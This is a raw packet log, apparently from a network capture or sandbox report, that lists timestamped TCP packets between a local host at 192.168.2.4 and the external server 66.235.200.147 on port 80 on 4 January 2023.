Jan 4, 2023 16:47:44.885524988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244009972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244045019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244071960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244096994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244133949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244160891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244153976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244189024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244208097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244218111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244244099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244244099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244244099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244261980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244270086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244291067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244311094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244319916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244344950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244348049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244369984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244378090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244400024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244410038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244426966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244432926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244453907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244457006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244483948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244491100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244510889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244513035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244541883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244546890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244570971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244571924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244597912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244601011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244626999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244637966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244653940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244659901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244680882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244683027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244700909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244703054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244725943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244749069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244752884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244771004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244775057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244801044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244803905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244827032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244828939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244849920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244853973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244869947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244879007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244896889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244903088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244927883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244927883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244950056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244952917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.244967937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.244976997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245003939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245023966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245028019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245053053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245054960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245074034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245085001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245098114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245109081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245122910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245147943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245151043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245151043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245172024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245193005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245279074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245299101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245317936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245342970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245352030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245367050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245377064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245388985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245412111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245414019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245436907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245444059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245460033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245474100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245482922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245495081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245508909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245516062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245536089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245538950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245560884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245565891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245585918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245590925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245606899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245615959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245635033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245640993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245660067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245666027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245688915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245697021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245714903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245717049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245738983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245739937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245762110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245764971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245788097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245794058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245809078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.245817900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.245862961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246208906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246227980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246248007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246268034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246287107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246292114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246316910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246316910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246342897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246341944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246365070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246376991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246388912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246398926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246414900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246422052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246438980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246443987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246464014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246467113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246488094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246490002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246512890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246512890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246536970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246540070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246560097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246561050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246581078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246587038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246601105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246611118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246633053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246634007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246654034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246659994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246674061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.246684074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.246731997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247067928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247104883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247123957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247147083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247155905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247169971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247181892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247193098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247215033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247216940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247240067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247248888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247265100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247287035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247289896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247313023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247318983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247335911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247351885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247359991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247374058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247384071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247395992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247407913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247416973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247431993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247437954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247457981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247462988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247482061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247487068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247508049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247510910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247533083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247534037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247556925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247556925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247579098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247586012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247602940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.247612953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.247662067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248078108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248115063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248133898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248153925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248172998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248181105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248205900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248209000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248230934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248234987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248251915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248265982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248276949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248286963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248301983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248310089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248327017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248348951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248356104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248356104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248372078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248380899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248398066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248404026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248426914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248431921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248447895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248456001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248478889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248481035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248501062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248506069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248522997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248531103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248552084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248574018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248575926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248601913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248610973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248626947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.248642921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248668909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.248682976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249041080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249061108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249079943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249106884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249113083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249135017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249135971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249146938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249160051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249171972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249186039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249195099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249211073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249222040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249236107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249247074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249260902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249264002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249285936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249289989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249310017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249315977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249332905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249341965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249362946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249366045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249388933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249391079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249413013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249414921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249435902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249449968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249458075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249474049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249481916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249497890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249505997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249520063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249531984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249542952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249553919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249564886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249578953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.249588966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249613047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.249634027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250073910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250094891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250114918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250140905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250140905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250159979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250166893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250191927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250199080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250215054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250231028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250238895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250261068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250264883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250289917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250292063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250313044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250322104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250338078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250343084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250369072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250370026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250392914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250396013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250411034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250420094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250443935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250447035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250464916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250469923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250489950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250495911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250515938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250520945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250546932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250545979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250566006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250572920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250588894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250597954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250617981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.250648975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.250684023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.251059055 CET	80	49696	66.235.200.147	192.168.2.4
